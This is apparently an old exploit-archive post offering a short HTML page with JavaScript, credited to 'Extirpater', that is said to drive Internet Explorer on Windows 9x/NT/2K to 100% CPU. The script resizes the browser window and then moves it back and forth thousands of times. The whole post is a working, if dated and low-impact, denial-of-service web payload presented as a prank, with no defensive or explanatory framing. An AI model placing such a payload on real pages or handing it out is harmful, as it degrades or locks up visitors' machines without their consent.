This Java script will cause Internet Explorer to consume 100% resources.
ccf266d0482f79af2aa42b9dd3497fd1Hi,
This funny java script will increase the CPU usage to %100 under Windows 9x / NT / 2K.
Tested under Internet Explorer.
------------ Cut Here ------------
<html>
<title> Written by Extirpater </title>
<script language="JavaScript">
top.moveTo(0,0);
top.resizeTo(screen.availWidth, screen.availHeight);
for (j =9999; j > 0; j--)
{
top.moveBy(0,1);
top.moveBy(0,-1);
}
</script>
</html>
Comments
No comments yet, be the first!